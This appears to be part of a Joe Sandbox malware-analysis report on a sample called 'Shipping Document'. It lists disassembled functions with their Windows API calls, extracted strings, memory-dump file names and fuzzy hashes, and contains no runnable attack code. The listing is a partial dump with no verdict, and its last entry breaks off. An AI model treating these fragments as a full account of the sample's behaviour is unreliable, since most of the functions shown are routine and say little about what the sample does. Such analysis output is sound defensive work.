Function 00FE023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00FE0280
+, xrefs: 00FE0277

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 1fa53b6d83c90de95afe9ba299ebbab4de19ce78cc8822c76195034f00eb1dc5
Instruction ID: 326957e0d48567a1cefc2738dad0ceb5de05aa518c2f342b54327874a8e8c871
Opcode Fuzzy Hash: 1fa53b6d83c90de95afe9ba299ebbab4de19ce78cc8822c76195034f00eb1dc5
Instruction Fuzzy Hash: D35135355042468FDF21AF2DCC89AF97BE4EF9A310F540095E8D19F2A4DB789883DB20

Function 00FD62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FD63A8
_memmove.LIBCMT ref: 00FD6446
_memset.LIBCMT ref: 00FD646A

Strings

ERCP, xrefs: 00FD6313

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 1d255c593922b31f3e7168a1ea724972d16fa2f30d6e17e416e8adb6aed9d786
Instruction ID: 4c2cc0963172324395f2bb7926a1ebb1a69df40541eeaed5ce68c4106723080d
Opcode Fuzzy Hash: 1d255c593922b31f3e7168a1ea724972d16fa2f30d6e17e416e8adb6aed9d786
Instruction Fuzzy Hash: ED51A171D003099BDB28DF65C8857AABBF5EF04324F14856FE98ACB341E7759684CB40

Function 01047BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0104F910,00000000,?,?,?,?), ref: 01047C4E
GetWindowLongW.USER32 ref: 01047C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 01047C7B

Strings

SysTreeView32, xrefs: 01047C20

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 29ac4ec83214688fc33a79149d7f8a57d9d5afbddcbe2a262217007649a632a3
Instruction ID: 0a047407d9908d435803ed3b2a7cb92f554ba4356b5321c7ec5784269623e1c5
Opcode Fuzzy Hash: 29ac4ec83214688fc33a79149d7f8a57d9d5afbddcbe2a262217007649a632a3
Instruction Fuzzy Hash: 4031E37120020AAFDB619E38DC85BEA7BA9FF45324F204729F9B5931D1D735E8509B90

Function 01047648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 010476D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010476E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 01047708

Strings

SysMonthCal32, xrefs: 0104769B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: fbb3f1c1420c1d1203fb0f329ba79a2f958d658692e9447c2c007d7aaff0b3b5
Instruction ID: 6204c10f4b744c40664e4a39f011044d4da4074708cc3d60d42d802800cf51b6
Opcode Fuzzy Hash: fbb3f1c1420c1d1203fb0f329ba79a2f958d658692e9447c2c007d7aaff0b3b5
Instruction Fuzzy Hash: 0D21B472500219ABDF22CE54CC86FEA3BA5FB4C754F110254FE956B1D1D7B5A8508B90

Function 01046F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01046FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01046FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01046FDF

Strings

Listbox, xrefs: 01046F77

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: b5305ac9391f502bc8c3e2bd6e813e83b44438bf4a114aa6d21ae8e433c54f8d
Instruction ID: 257dff18516ef531703a7922ae140b5d07be28320a0538b58dfb18be01008918
Opcode Fuzzy Hash: b5305ac9391f502bc8c3e2bd6e813e83b44438bf4a114aa6d21ae8e433c54f8d
Instruction Fuzzy Hash: 9B21C572610118BFEF128F58CCC5FAB37AAFF8A750F418164F9859B191DA729C51C7A0

Function 0104797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 010479E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 010479F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01047A03

Strings

msctls_trackbar32, xrefs: 010479B8

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: e833233b23bc6e531705403babfbcc486eb81e4c9a51defaba68b415f3747271
Instruction ID: 0466ae7f34f71638ab6eec639d0599b8e46dbd776d1419b05bdc1d220e14d43b
Opcode Fuzzy Hash: e833233b23bc6e531705403babfbcc486eb81e4c9a51defaba68b415f3747271
Instruction Fuzzy Hash: ED11E772250249BBEF219E74CC45FEB77A9EFC9764F02052DF681A6091D272D811CB60

Function 00FC4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FC4C2E), ref: 00FC4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FC4CB5

Strings

GetNativeSystemInfo, xrefs: 00FC4CAF
kernel32.dll, xrefs: 00FC4C9E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: f0d661256bcae0dfa440629162172e32702a917cbf22bf093d790775248fd42a
Instruction ID: 6fb35f3f32efa3f76585b464e19413891f8b6107471eac1f5694cd58b257668e
Opcode Fuzzy Hash: f0d661256bcae0dfa440629162172e32702a917cbf22bf093d790775248fd42a
Instruction Fuzzy Hash: 2FD012B4911723CFD7209F39DBA9A0676D5AF06691B11883D98C5D6520D674D880C750

Function 00FC4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FC4CE1,?), ref: 00FC4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FC4DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00FC4DAE
kernel32.dll, xrefs: 00FC4D9D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 8698d0fd7577dcac371597c01b0be65b7570fb992fd62ba789d8c92c6e9ea9ae
Instruction ID: feee7a2729a405c6e7d75dff812333459acbf2cd9d0865439c09094a755aa006
Opcode Fuzzy Hash: 8698d0fd7577dcac371597c01b0be65b7570fb992fd62ba789d8c92c6e9ea9ae
Instruction Fuzzy Hash: 8FD0C2B4900313CFC7305F35C659B4672D4AF06290B00883DD8C2C6510D774D880C750

Function 00FC4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FC4D2E,?,00FC4F4F,?,010862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FC4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FC4D81

Strings

kernel32.dll, xrefs: 00FC4D6A
Wow64DisableWow64FsRedirection, xrefs: 00FC4D7B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: c078213387769f5beb3b86b7a13b858620e5cb5b34c8772ecfe7bcf1ebc570fb
Instruction ID: 65b76d246f68a22d3ef8d8678c861e0cb359a0bd9c6fae5bb5b4b2fed352f2d4
Opcode Fuzzy Hash: c078213387769f5beb3b86b7a13b858620e5cb5b34c8772ecfe7bcf1ebc570fb
Instruction Fuzzy Hash: 69D012B4910713CFD7305F35DA59B1676D8BF162A1B11887D98C7D6210D675D880CB90

Function 01041072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,010412C1), ref: 01041080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01041092

Strings

advapi32.dll, xrefs: 0104107B
RegDeleteKeyExW, xrefs: 0104108C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 32fed3d519d14a058d7725263e5af03ed2e2fb1c4efd2ec83b215aae1e0dc788
Instruction ID: 46f7fcf38d131e309cbfbcfb99c65da4bade0050e1048d88295eef37b68e84b7
Opcode Fuzzy Hash: 32fed3d519d14a058d7725263e5af03ed2e2fb1c4efd2ec83b215aae1e0dc788
Instruction Fuzzy Hash: 19D012F49117138FD7305F39D59895676E4AF05251F118C7DA4C5DA110DAB4D4C0C754

Function 010393F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,01039009,?,0104F910), ref: 01039403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01039415

Strings

kernel32.dll, xrefs: 010393FE
GetModuleHandleExW, xrefs: 0103940F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: f596ecb23cbd8a9f6a1f7dd6660403c8665e487f8ae949925e8c4fcc38ad6ded
Instruction ID: 11bd44c6b307e17edae3b950c7110997fe3762dbd17d89ab0ed3139333788bf4
Opcode Fuzzy Hash: f596ecb23cbd8a9f6a1f7dd6660403c8665e487f8ae949925e8c4fcc38ad6ded
Instruction Fuzzy Hash: 39D0C2B4900313CFD7204F39C64890776D8AF02241B10C83D94C1C6510DAB4C4C0C750

Function 01001B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 01001B42
__swprintf.LIBCMT ref: 01001B73

Strings

WIN_XPe, xrefs: 01001BB2
%.3d, xrefs: 01001B4D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 34844ab1f7fc08c28c37b250e49a640718e191bad41cde71d2c0aceff98b4629
Instruction ID: e1ab5b19105051a4878c21270e96686bd06c71d2419302602a2a271f0a6e911b
Opcode Fuzzy Hash: 34844ab1f7fc08c28c37b250e49a640718e191bad41cde71d2c0aceff98b4629
Instruction Fuzzy Hash: 36D012B6C04519EBDB159A918D89DFD777CAB04301F440592F58692040F379DB849B25

Function 010176C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4756d82395062060e7004c1325a9e840668f110db1ec1a84a6a24a208bae8b
Instruction ID: ab3d8b574025ae573560cc5137b8c1cb11098e5a83a213d6e2cf1445f8b1bf36
Opcode Fuzzy Hash: 2b4756d82395062060e7004c1325a9e840668f110db1ec1a84a6a24a208bae8b
Instruction Fuzzy Hash: EBC19075A00216EFDB14CF98C884EAEBBF5FF48310B148598E985EB255D734EE81CB90

Function 0103E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0103E3D2
CharLowerBuffW.USER32(?,?), ref: 0103E415

Part of subcall function 0103DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0103DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0103E615
_memmove.LIBCMT ref: 0103E628

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 09326dce09e49ae6eb4c94c0a0722c41a6df3779928a45750603659b4ea42712
Instruction ID: 10b031150b8e685a1e9a44a37d27d3b048b7a38ab2c18dcebefefeb248c2c51d
Opcode Fuzzy Hash: 09326dce09e49ae6eb4c94c0a0722c41a6df3779928a45750603659b4ea42712
Instruction Fuzzy Hash: C8C16B716083428FC754DF28C480A5ABBE4FF88714F048A6DF8999B351DB75E946CF82

Function 010383A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 010383D8
CoUninitialize.OLE32 ref: 010383E3

Part of subcall function 0101DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0101DAC5

VariantInit.OLEAUT32(?), ref: 010383EE
VariantClear.OLEAUT32(?), ref: 010386BF

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 9874b1169a2d135bd6fcd43d301ee96976ee865f2633107119196f5ff8352ac3
Instruction ID: 93680846187b5d6f475b9540ee4173385e3fdbfc44cad2029073b6b1c59ddb1d
Opcode Fuzzy Hash: 9874b1169a2d135bd6fcd43d301ee96976ee865f2633107119196f5ff8352ac3
Instruction Fuzzy Hash: BFA127752047029FDB10DF19C985F1ABBE8BF88714F05858DFA9A9B3A1CB74E904DB41

Function 01016DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01016E04
SysAllocString.OLEAUT32(00000000), ref: 01016EAD
VariantCopy.OLEAUT32 ref: 01016EDC
VariantClear.OLEAUT32(?), ref: 01016F03

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 60e5d7c339c1e2406ee92efa516d90a10c36e96d04e2ce7092bee6104f483a02
Instruction ID: 6889224c4cf0f9fd2176a465e536700bb5f7baa0800ede167c9235b020c5caa9
Opcode Fuzzy Hash: 60e5d7c339c1e2406ee92efa516d90a10c36e96d04e2ce7092bee6104f483a02
Instruction Fuzzy Hash: 8C51B134604303DADB60AF69D895B6EB7E5AF48310F50881FF6D6CB295DFB9D8808B11

Function 010297E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00FC5045: _fseek.LIBCMT ref: 00FC505D

Part of subcall function 010299BE: _wcscmp.LIBCMT ref: 01029AAE
Part of subcall function 010299BE: _wcscmp.LIBCMT ref: 01029AC1

_free.LIBCMT ref: 0102992C
_free.LIBCMT ref: 01029933
_free.LIBCMT ref: 0102999E

Part of subcall function 00FE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FE9C64), ref: 00FE2FA9
Part of subcall function 00FE2F95: GetLastError.KERNEL32(00000000,?,00FE9C64), ref: 00FE2FBB

_free.LIBCMT ref: 010299A6

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction ID: 67db03b5e7cc8cf04c06ad7dab76d941683f5e4a7cf60b32a82b1c797136cfbf
Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction Fuzzy Hash: A55183B1E04269AFDF249F64CC81B9EBBB9EF48314F00009EF649A7241DB755980CF58

Function 01049A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(011DEA70,?), ref: 01049AD2
ScreenToClient.USER32(00000002,00000002), ref: 01049B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01049B72

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7da11f49b51042fe1384832e9deeb1fb553262301ae9277c6524d9eedd779cc8
Instruction ID: 82f8fa730de6b68f64ede41c6603f9c9230b1fffd1a5d614f6ccf0d70a1d8948
Opcode Fuzzy Hash: 7da11f49b51042fe1384832e9deeb1fb553262301ae9277c6524d9eedd779cc8
